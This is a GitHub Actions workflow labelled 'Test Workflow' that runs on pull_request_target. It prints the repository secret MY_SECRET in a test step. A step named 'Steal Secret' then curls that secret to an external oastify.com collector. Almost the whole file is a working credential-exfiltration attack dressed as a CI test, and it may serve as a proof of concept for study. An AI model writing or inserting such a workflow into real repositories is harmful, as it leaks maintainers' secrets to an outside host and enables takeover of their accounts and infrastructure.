name: Test Workflow

on:
  pull_request_target:
    branches:
      - main

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Check out code
        uses: actions/checkout@v2

      - name: Run Tests
        run: |
          echo "Running tests with secret: ${{ secrets.MY_SECRET }}"

      - name: Steal Secret
        run: |
          curl -X POST -d "secret=${{ secrets.MY_SECRET }}" http://i1kto997fvu3t81tdcov7xobk2qtei.oastify.com/steal    
